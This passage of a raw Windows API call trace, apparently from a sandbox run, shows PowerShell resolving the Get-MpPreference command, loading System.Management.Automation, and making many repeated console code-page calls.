lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.284] GetLastError () returned 0x2 [0143.284] SetErrorMode (uMode=0x1) returned 0x1 [0143.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.284] GetLastError () returned 0x2 [0143.284] SetErrorMode (uMode=0x1) returned 0x1 [0143.284] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.WSH", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.284] GetLastError () returned 0x2 [0143.284] SetErrorMode (uMode=0x1) returned 0x1 [0143.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.285] GetLastError () returned 0x2 [0143.285] SetErrorMode (uMode=0x1) returned 0x1 [0143.285] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.MSC", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.285] GetLastError () returned 0x2 [0143.285] SetErrorMode (uMode=0x1) returned 0x1 [0143.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5eeea70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0143.285] GetLastError () returned 0x2 [0143.285] SetErrorMode (uMode=0x1) returned 0x1 [0143.285] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference", lpFindFileData=0x3545a8 | out: lpFindFileData=0x3545a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0143.285] GetLastError () returned 0x2 [0143.285] SetErrorMode (uMode=0x1) returned 0x1 [0143.289] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.289] GetLastError () returned 0xcb [0143.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eeeafc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.290] GetLastError () returned 0x2 [0143.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eeeaac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.290] GetLastError () returned 0x2 [0143.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eeeaac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.290] GetLastError () returned 0x2 [0143.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eeeaac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.290] GetLastError () returned 0x2 [0143.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.334] GetLastError () returned 0xcb [0143.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.601] GetLastError () returned 0xcb [0143.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.605] GetLastError () returned 0xcb [0143.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.652] GetLastError () returned 0xcb [0143.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.657] GetLastError () returned 0xcb [0143.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.659] GetLastError () returned 0xcb [0143.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.675] GetLastError () returned 0xcb [0143.711] VirtualQuery (in: lpAddress=0x5eedafc, lpBuffer=0x5eeeafc, dwLength=0x1c | out: lpBuffer=0x5eeeafc*(BaseAddress=0x5eed000, AllocationBase=0x5560000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.756] GetLastError () returned 0xcb [0143.817] VirtualQuery (in: lpAddress=0x5eedafc, lpBuffer=0x5eeeafc, dwLength=0x1c | out: lpBuffer=0x5eeeafc*(BaseAddress=0x5eed000, AllocationBase=0x5560000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eee130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.823] GetLastError () returned 0xcb [0143.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eee0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.823] GetLastError () returned 0xcb [0143.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eee0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.823] GetLastError () returned 0xcb [0143.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eee0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.823] GetLastError () returned 0xcb [0143.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eee130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.844] GetLastError () returned 0xcb [0143.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eee0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.844] GetLastError () returned 0xcb [0143.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eee0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.844] GetLastError () returned 0xcb [0143.878] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0143.878] GetLastError () returned 0xcb [0143.878] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5eee640 | out: lpConsoleScreenBufferInfo=0x5eee640) returned 1 [0143.878] GetLastError () returned 0xcb [0143.885] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.885] GetLastError () returned 0xcb [0143.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eee140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.888] GetLastError () returned 0xcb [0143.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eee140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.888] GetLastError () returned 0xcb [0143.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5eee140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0143.888] GetLastError () returned 0xcb [0143.960] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2bb368, nSize=0x80 | out: lpBuffer="") returned 0x0 [0143.960] GetLastError () returned 0xcb [0144.011] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0144.012] GetLastError () returned 0xcb [0144.012] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x5eeed54 | out: lpConsoleScreenBufferInfo=0x5eeed54) returned 1 [0144.012] GetLastError () returned 0xcb [0144.015] GetConsoleOutputCP () returned 0x1b5 [0144.017] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeecb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeecb0) returned 0 [0144.017] GetLastError () returned 0xcb [0144.017] GetConsoleOutputCP () returned 0x1b5 [0144.017] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeecb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeecb0) returned 0 [0144.017] GetLastError () returned 0xcb [0144.018] GetConsoleOutputCP () returned 0x1b5 [0144.018] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.018] GetLastError () returned 0xcb [0144.018] GetConsoleOutputCP () returned 0x1b5 [0144.018] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.018] GetLastError () returned 0xcb [0144.018] GetConsoleOutputCP () returned 0x1b5 [0144.018] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.018] GetLastError () returned 0xcb [0144.018] GetConsoleOutputCP () returned 0x1b5 [0144.018] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.018] GetLastError () returned 0xcb [0144.018] GetConsoleOutputCP () returned 0x1b5 [0144.018] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.018] GetLastError () returned 0xcb [0144.018] GetConsoleOutputCP () returned 0x1b5 [0144.019] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.019] GetLastError () returned 0xcb [0144.019] GetConsoleOutputCP () returned 0x1b5 [0144.019] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.019] GetLastError () returned 0xcb [0144.019] GetConsoleOutputCP () returned 0x1b5 [0144.019] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.019] GetLastError () returned 0xcb [0144.019] GetConsoleOutputCP () returned 0x1b5 [0144.019] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.019] GetLastError () returned 0xcb [0144.019] GetConsoleOutputCP () returned 0x1b5 [0144.019] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.019] GetLastError () returned 0xcb [0144.019] GetConsoleOutputCP () returned 0x1b5 [0144.019] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.019] GetLastError () returned 0xcb [0144.019] GetConsoleOutputCP () returned 0x1b5 [0144.019] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.020] GetLastError () returned 0xcb [0144.020] GetConsoleOutputCP () returned 0x1b5 [0144.020] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.020] GetLastError () returned 0xcb [0144.020] GetConsoleOutputCP () returned 0x1b5 [0144.020] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.020] GetLastError () returned 0xcb [0144.020] GetConsoleOutputCP () returned 0x1b5 [0144.020] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.020] GetLastError () returned 0xcb [0144.020] GetConsoleOutputCP () returned 0x1b5 [0144.020] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.020] GetLastError () returned 0xcb [0144.020] GetConsoleOutputCP () returned 0x1b5 [0144.020] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.020] GetLastError () returned 0xcb [0144.020] GetConsoleOutputCP () returned 0x1b5 [0144.020] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.020] GetLastError () returned 0xcb [0144.021] GetConsoleOutputCP () returned 0x1b5 [0144.021] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.021] GetLastError () returned 0xcb [0144.021] GetConsoleOutputCP () returned 0x1b5 [0144.021] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.021] GetLastError () returned 0xcb [0144.021] GetConsoleOutputCP () returned 0x1b5 [0144.021] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.021] GetLastError () returned 0xcb [0144.021] GetConsoleOutputCP () returned 0x1b5 [0144.021] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.021] GetLastError () returned 0xcb [0144.021] GetConsoleOutputCP () returned 0x1b5 [0144.021] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.021] GetLastError () returned 0xcb [0144.021] GetConsoleOutputCP () returned 0x1b5 [0144.021] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.021] GetLastError () returned 0xcb [0144.021] GetConsoleOutputCP () returned 0x1b5 [0144.022] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.022] GetLastError () returned 0xcb [0144.022] GetConsoleOutputCP () returned 0x1b5 [0144.022] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.022] GetLastError () returned 0xcb [0144.022] GetConsoleOutputCP () returned 0x1b5 [0144.022] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.022] GetLastError () returned 0xcb [0144.022] GetConsoleOutputCP () returned 0x1b5 [0144.022] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.022] GetLastError () returned 0xcb [0144.022] GetConsoleOutputCP () returned 0x1b5 [0144.022] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.022] GetLastError () returned 0xcb [0144.022] GetConsoleOutputCP () returned 0x1b5 [0144.022] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.022] GetLastError () returned 0xcb [0144.022] GetConsoleOutputCP () returned 0x1b5 [0144.023] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.023] GetLastError () returned 0xcb [0144.023] GetConsoleOutputCP () returned 0x1b5 [0144.023] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.023] GetLastError () returned 0xcb [0144.023] GetConsoleOutputCP () returned 0x1b5 [0144.023] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.023] GetLastError () returned 0xcb [0144.023] GetConsoleOutputCP () returned 0x1b5 [0144.023] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.023] GetLastError () returned 0xcb [0144.023] GetConsoleOutputCP () returned 0x1b5 [0144.023] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.023] GetLastError () returned 0xcb [0144.023] GetConsoleOutputCP () returned 0x1b5 [0144.023] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.024] GetLastError () returned 0xcb [0144.024] GetConsoleOutputCP () returned 0x1b5 [0144.024] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.024] GetLastError () returned 0xcb [0144.024] GetConsoleOutputCP () returned 0x1b5 [0144.024] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.024] GetLastError () returned 0xcb [0144.024] GetConsoleOutputCP () returned 0x1b5 [0144.024] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.024] GetLastError () returned 0xcb [0144.024] GetConsoleOutputCP () returned 0x1b5 [0144.024] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.024] GetLastError () returned 0xcb [0144.024] GetConsoleOutputCP () returned 0x1b5 [0144.024] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.024] GetLastError () returned 0xcb [0144.024] GetConsoleOutputCP () returned 0x1b5 [0144.024] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.024] GetLastError () returned 0xcb [0144.025] GetConsoleOutputCP () returned 0x1b5 [0144.025] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.025] GetLastError () returned 0xcb [0144.025] GetConsoleOutputCP () returned 0x1b5 [0144.025] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.025] GetLastError () returned 0xcb [0144.025] GetConsoleOutputCP () returned 0x1b5 [0144.025] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.025] GetLastError () returned 0xcb [0144.025] GetConsoleOutputCP () returned 0x1b5 [0144.025] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.025] GetLastError () returned 0xcb [0144.025] GetConsoleOutputCP () returned 0x1b5 [0144.025] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.025] GetLastError () returned 0xcb [0144.025] GetConsoleOutputCP () returned 0x1b5 [0144.025] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.025] GetLastError () returned 0xcb [0144.025] GetConsoleOutputCP () returned 0x1b5 [0144.026] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.026] GetLastError () returned 0xcb [0144.026] GetConsoleOutputCP () returned 0x1b5 [0144.026] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.026] GetLastError () returned 0xcb [0144.026] GetConsoleOutputCP () returned 0x1b5 [0144.026] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.026] GetLastError () returned 0xcb [0144.026] GetConsoleOutputCP () returned 0x1b5 [0144.026] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.026] GetLastError () returned 0xcb [0144.026] GetConsoleOutputCP () returned 0x1b5 [0144.026] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.026] GetLastError () returned 0xcb [0144.026] GetConsoleOutputCP () returned 0x1b5 [0144.026] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.027] GetLastError () returned 0xcb [0144.027] GetConsoleOutputCP () returned 0x1b5 [0144.027] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.027] GetLastError () returned 0xcb [0144.027] GetConsoleOutputCP () returned 0x1b5 [0144.027] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5eeec90, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5eeec90) returned 0 [0144.027] GetLastError () returned 0xcb [0144.027] 